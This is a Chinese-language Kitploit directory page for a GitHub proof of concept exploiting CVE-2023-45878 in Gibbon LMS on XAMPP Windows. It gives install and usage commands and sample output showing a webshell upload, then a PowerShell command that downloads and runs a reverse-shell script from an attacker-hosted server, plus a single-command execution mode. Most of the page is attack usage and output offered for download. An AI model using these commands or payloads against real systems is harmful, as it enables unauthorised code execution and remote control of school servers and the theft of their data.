Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-45878-POC — CVE-2023-45878 poc for gibbon LMS on xampp windows | Kitploit
工具/GitHubGitHub/pauldhaes/cve-2023-45878-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubpauldhaes/cve-2023-45878-poc

CVE-2023-45878-POC

CVE-2023-45878 poc for gibbon LMS on xampp windows

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-45878-POC

CVE-2023-45878 在 XAMPP Windows 上针对 Gibbon LMS 的概念验证。 上传名为 shell.php 的 webshell 用于命令注入。 对于反向 Shell,上传一个名为 shell.ps1 的 PowerShell 反向 Shell ps1 脚本,该脚本通过 shell.php 上传到目标机器。

需求

Python3 Requests python3 模块 netcat

root@kitploit:~
pip3 install requests

虚拟环境

root@kitploit:~
mkdir CVE-2023-45878
cd CVE-2023-45878
python3 -m venv CVE
source CVE/bin/activate
cd ..
pip3 install requests

用法

已在运行于 XAMPP Windows 且未启用杀毒软件的 Gibbon LMS 上测试。 目标可通过 Gibbon 登录页面找到,例如 http://gibbon-example/Gibbon-LMS/

反向 Shell

root@kitploit:~
python3 reverse.py --reverse-shell -target_url http://target -ip IP -port REV-PORT -srvport SRVPORT

结果

root@kitploit:~
[+] PHP Shell 上传成功到 http://target/shell.php
[+] PowerShell 反向 Shell 脚本已保存为: shell.ps1
[+] Shell 现在托管在 shell.ps1
后台启动反向 Shell 监听器...
在 ip:REV-PORT 上启动 netcat 监听器...
[+] HTTP 服务器在后台运行于端口 SRVPORT
[+] 执行 PHP Shell 以下载并执行 shell.ps1
执行: http://target/shell.php?cmd=powershell%20-nop%20-w%20hidden%20-c%20IEX%20%28New-Object%20Net.WebClient%29.DownloadString%28%27http%3A//IP%3ASRVPORT/shell.ps1%27%29
[+] HTTP 服务器已启动在 http://0.0.0.0:SRVPORT/
TARGET-IP - - [20/Mar/2025 12:59:11] "GET /shell.ps1 HTTP/1.1" 200 -
来自 TARGET-IP 的连接

PS C:\xampp\htdocs\Gibbon-LMS>

单个命令

root@kitploit:~
python3 reverse.py --single -target_url http://target -command whoami

结果

root@kitploit:~
[+] PHP Shell 上传成功到 http://target/shell.php
[+] 执行 PHP 命令
执行: http://target/shell.php?whoami
[+] 命令执行成功,按回车
vuln\w.webservice

致谢

https://herolab.usd.de/security-advisories/usd-2023-0025/

下载工具